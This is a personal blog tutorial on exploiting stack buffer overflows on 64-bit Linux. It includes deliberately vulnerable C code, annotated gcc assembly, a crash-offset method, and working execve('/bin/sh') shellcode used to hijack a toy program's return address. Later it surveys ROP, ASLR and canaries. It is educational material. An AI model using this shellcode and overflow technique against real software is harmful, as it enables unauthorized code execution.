Exploiting Stack Buffer Overflows

This post accumulates information on how to take control of applications using buffer overflows. We’ll start with a motivating example. Jon Larimer (yeah, they guy is working for IBM), exploits buffer overflows to gain control of a screensaved linux machine. Here is the video (minute 45 and upwards is most fun). He mentions the book The Art of Software Security Assessment, I’m not sure if it’s that good.

This first example shall be a introduction to the idea behind a buffer overflow. The vulnerability can be used to be authenticated without the proper access rights. Such a scenario should be relatively rare, but why not be lucky once in a while. Keep in mind, whether this works or not is very compiler dependent. I was using gcc 4.5.2, intel 64bit, linux.

#include <stdio.h>

int verify_password(char *username, char *password) {
    return 0; // this would be more complex
}

int authenticate(char *username, char *password)
{
    int authenticated;
    char buffer[8];
    int i = 0;

    authenticated = verify_password(username, password);

    if(authenticated == 0)
    {
        sprintf(buffer,
                "%s",
                username);
        printf("%s\n", buffer);
   }

   return authenticated;
}

int main() {
    char* user = "konne is\x01";
    char* pw = "password";

    int v = authenticate(user,pw);
    printf("%d\n",v);

    return 0;
}

What happens is that buffer can not hold the entire username. This is why it spills into the memory around it. Because it is on the stack, this memory will hold other variables, in our case authenticated.
This is definitively cool, but it would be even better if we could figure out how to overwrite the return address of the function. This return value is stored on the stack when using the asm command call.

Let’s do some dissembling to figure out where the stuff is we need to overwrite. gcc -S (as described here) can be used to disassemble an application. If you know as much about asm as I do, you will need some sort of explanation(german) of what is going on.

Overview of the most important stuff about the ASM:

  • Syntax is called AT&T-Syntax
  • mov source,destination
  • Constants start with $

It looks as if the stack pointer is in the %rsp register. The base pointer should be in %rbp. (The base pointer points to the start of our function’s local variables). As of now, I have no clue what the .cfi* things stand for

The meaning of the following command is
movq %rdi, -24(%rbp)
Copy the value of %rdi to the base pointer’s address with an offset of -24.

Following the disassembled version of the code from before. (Read it, it’s full of handwritten comments)

.file	"stacktest.c"
.text

// ####################################
// This is the function verify_password
// ####################################

.globl verify_password
	.type	verify_password, @function
verify_password:
.LFB0:
	.cfi_startproc
	pushq	%rbp          // backup the base pointer
	.cfi_def_cfa_offset 16
	movq	%rsp, %rbp        // set the basepointer to the stacktop
	.cfi_offset 6, -16
	.cfi_def_cfa_register 6

	movq	%rdi, -8(%rbp)      // looks like this was some sort of fastcall and
	movq	%rsi, -16(%rbp)     // we push the registers onto the stack
	movl	$0, %eax            // prepare the return value
	leave                       // restores the base pointer
	.cfi_def_cfa 7, 8
	ret                         // jumps to the calling function, this is the value
	                            // we want to overwrite
	.cfi_endproc
.LFE0:
	.size	verify_password, .-verify_password

// #################################
// This is the function authenticate
// #################################

.globl authenticate
	.type	authenticate, @function
authenticate:
.LFB1:
	.cfi_startproc
	pushq	%rbp                // base pointer stuff
	.cfi_def_cfa_offset 16
	movq	%rsp, %rbp
	.cfi_offset 6, -16
	.cfi_def_cfa_register 6

	subq	$32, %rsp           // prepare the stackpointer for the values to be pushed
	movq	%rdi, -24(%rbp)     // again fastcall parameters
	movq	%rsi, -32(%rbp)
	movl	$0, -4(%rbp)        // init i, -4 is i

	// prepare the call to verify_password
	// this whole copying of the parameters just seems rediculus
	// but I didn't use any optimization (1)
	movq	-32(%rbp), %rdx     // password -32, see (2)
	movq	-24(%rbp), %rax
	movq	%rdx, %rsi
	movq	%rax, %rdi
	call	verify_password
	movl	%eax, -8(%rbp)      // stores the return value in authentification

	// if authentification == 0
	cmpl	$0, -8(%rbp)
	jne	.L3
	// then

	// prepare call to strcpy, moving the right values into the registers
	// now why is this strcpy? shouldn't it be sprintf?
	// well apparently, gcc is smart enougth to optimize that call
	// even with optimization turned off, but totally screws up in (1)
	movq	-24(%rbp), %rdx   // this tells us, that the username is -24 (2)
	leaq	-16(%rbp), %rax   // buffer is -16
	movq	%rdx, %rsi
	movq	%rax, %rdi
	call	strcpy

	// again, gcc changes the function we are calling
	leaq	-16(%rbp), %rax
	movq	%rax, %rdi
	call	puts
	// endif

.L3:
	movl	-8(%rbp), %eax      // return authentification
	leave                       // reset the basepointer
	.cfi_def_cfa 7, 8
	ret                         // return
	.cfi_endproc
.LFE1:
	.size	authenticate, .-authenticate
	.section	.rodata

// #################################
// Some static data
// #################################

.LC0:
	.string	"konne is\001"
.LC1:
	.string	"password"
.LC2:
	.string	"%d\n"
	.text

// #################################
// This is the function authenticate
// #################################

.globl main
	.type	main, @function
main:
.LFB2:
	.cfi_startproc      // backup base pointer
	pushq	%rbp
	.cfi_def_cfa_offset 16
	movq	%rsp, %rbp
	.cfi_offset 6, -16
	.cfi_def_cfa_register 6

	 // prepare stack for authentication function call
	subq	$32, %rsp
	movq	$.LC0, -8(%rbp)     // push pointers to the static data on the stack
	movq	$.LC1, -16(%rbp)
	movq	-16(%rbp), %rdx
	movq	-8(%rbp), %rax
	movq	%rdx, %rsi
	movq	%rax, %rdi
	call	authenticate
	movl	%eax, -20(%rbp)     // save return value

	// print the value
	movl	$.LC2, %eax
	movl	-20(%rbp), %edx
	movl	%edx, %esi
	movq	%rax, %rdi
	movl	$0, %eax
	call	printf
	movl	$0, %eax

	leave           // restore base pointer
	.cfi_def_cfa 7, 8
	ret             // return
	.cfi_endproc
.LFE2:
	.size	main, .-main
	.ident	"GCC: (GNU) 4.5.2 20110127 (prerelease)"
	.section	.note.GNU-stack,"",@progbits

About the fast-call stuff, I was right, see wikipedia. The convention is called AMD64 ABI convention.

So what did we learn from looking at the ASM? Well the stack looks as follows (lower addresses on top of page, keep in mind stack grows towards lower addresses).

-32/8 [password]
-24/8 [username]
-16/8 [buffer]
-8/4 [authentification]
-4/4 [i]
0/8 [backup rbp]
8/8 [hopefully return pointer]

8+4+4+8 = 8*3 = 24 characters in buffer should catapult us to the function’s return pointer, so that we can overwrite it. Finding out about the return value’s stack position this way is rather cumbersome. An easier way is to just write a lot of characters and see which value was in the return position when the app crashes.
Just do something like
user = “AAAAAAAAAAAAAAAAAAAAAAAAA”;

If you examine the core file with gdb you’ll see
% gdb -q -c core
[New Thread 17093]
Core was generated by `./stacktest’.
Program terminated with signal 11, Segmentation fault.
#0 0x0000000041414141 in ?? ()

We see that 4 bytes of the return pointer were overwritten (0x41 = ‘A’). With this technique, the problem turns into a simple binary search.

Let’s try to write some assembler and jump to it. If you don’t know how to write inline ASM yet, checkout the the tutorial about gcc inline assembler.

I’m basically copying an example from the book mentioned in the beginning. It is just too pretty!
Keep in mind that syscalls and 64bit are weird. Here is a good example on how to do 64bit syscalls. The call numbers are found in /usr/include/asm/unistd_64.h or in the gcc assembly.

With this information, we can write an ASM example that should work.

    asm("jmp end             \n"
        "code:               \n"
        "popq %rdi           \n" // popl %ebx
                                 // EBX = pathname argument
        "xorq %rax, %rax     \n" // zero out EAX
        "movq %rax, %rdx     \n" // EDX = envp
        "pushq %rax          \n" // pushl %eax
                                 // put NULL in argv array
        "pushq %rdi          \n" // pushl %ebx
                                 // put "/bin/sh" in argv array
        "movq %rsp, %rsi     \n" // ECX = argv
        "movq $59, %rax      \n" // 0x0b = execve() system call
        "syscall             \n" // system call
        "call code           \n"
        ".string \"/bin/sh\" ");

but it doesn’t. Time for gdb. Stepping thought ASM is explained here. So I found the bug. Here is the fixed version, strike it works!

#include <stdio.h>
#include <string.h>

void myasm() {
    asm(".text               \n"
        "jmp end             \n" // prepare loading string's address
        "code:               \n"
        "popq %rdi           \n" // RDI = pathname argument
        "xorq %rax, %rax     \n" // zero out RAX
        "movq %rax, %rdx     \n" // RDX = envp
        "pushq %rax          \n" // put NULL in argv array
        "pushq %rdi          \n" // put "/bin/sh" in argv array
        "movq %rsp, %rsi     \n" // RSI = argv
        "movq $59, %rax      \n" // 59 = execve() system call
        "syscall             \n" // system call
        "end:                \n"
        "call code           \n" // this pushes the string's address
                                 // onto the stack, and jumps to code:
        ".string \"/bin/sh\" \n"
        ".text");
}

int verify_password(char *username, char *password) {
    return 0;
}

int authenticate(char *username, char *password)
{
    int authenticated;
    char buffer[8];
    int i = 0;

    authenticated = verify_password(username, password);

    if(authenticated == 0)
    {
        sprintf(buffer,"%s",username);
        printf("You (%s) are not allowed in here!\n", buffer);
    }

    return authenticated;
}

int main() {
    char user[33];

    long asmptr = (long)myasm;
    strcpy(user,"012345678901234567890123--------");
    ((long*)user)[3] = asmptr;
    char* pw = "password";
    int v = authenticate(user,pw);

    printf("%d\n",v);

    return 0;
}

The problem is that most software does not ship with functionality that will start a terminal, so we can’t just jump to it. But it would be very easy to just put the parameters on the stack and call the appropriate c function. Unfortunately, there are common measures to prevent this. Address space layout randomization ASLR is our enemy. It loads libraries to random positions so that we can’t just pass a constant pointer to the return command. Let’s see how well the randomization works. Well, I overestimated linux’s abilities. They don’t do ASLR with libraries.

But even though it is easy to jump to a system library function, it is hard to pass parameters. All 64bit architectures pass almost all parameters using registers and not the stack. But it is very hard to get parameters into registers when all we have is a stack overflow.

The solution to all our pains is Return Oriented Programming. I won’t explain it here, but I will make you go and look it up somewhere else (haha, I’m that powerful). Together with the previous link and this tutorial, you should have enough information to understand it. It’s really not that hard.
Following a quote that should further motivate you to read on.

We describe return-oriented programming, a generalization of return-into-libc that allows an attacker to undertake arbitrary, Turing-complete computation without injecting code.

For ROP to work, it is necessary to have a rather large code basis. The C++ std lib is big and should contain enough code. g++ -static-libstdc++ stacktest.c -o stacktest links your program with the C++ std library. As epic as ROP is, it has one major drawback. I have not found a tool yet, that finds the needed assembler command’s locations for you.

Canaries in GCC are another evil invention. They will render our attacks impossible or at least very hard. They put a check value before the return value’s position on the stack. This value is checked as the return value is executed. If it was altered (you will generally have to overwrite it if you want to overwrite the return address) the application terminates loudly. But they introduce a runtime overhead, making them very expensive.

Control-Flow Integrity (German article) is a at the time not yet implemented technique to prevent ROP. I have no clue how it works due to lack of interest.

A summary of many defense mechanisms is described in this presentation. If you (are lame and) use a 32bit windows, checkout this tutorial. And yet another very good tutorial.

Now that you know all the necessary stuff, do you want to become a security specialist? Following a history of found vulnerabilities.
History

As you can see, they didn’t come up with many ways to attack a system in the entire history of buffer overflow research. But coming up with new attacks is really not that hard. JIT Spraying (German link) is an example of an awesome new attack vector that is so hard to come up with :).

So I tried to find a real world security issue myself. And I realized what most of a security guy’s work is all about. Reading code and finding vulnerabilities. It is extremely frustrating because you can’t tell if you have any progress. Maybe it wasn’t smart to look at code written by a security guy. But I can now say that GTK’s io-xpm.c seems to be save.

I think I don’t want to be a security specialist. It sounds pretty boring. But if you feel differently, give me your opinion.

Advertisements
This entry was posted in Uncategorized. Bookmark the permalink.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s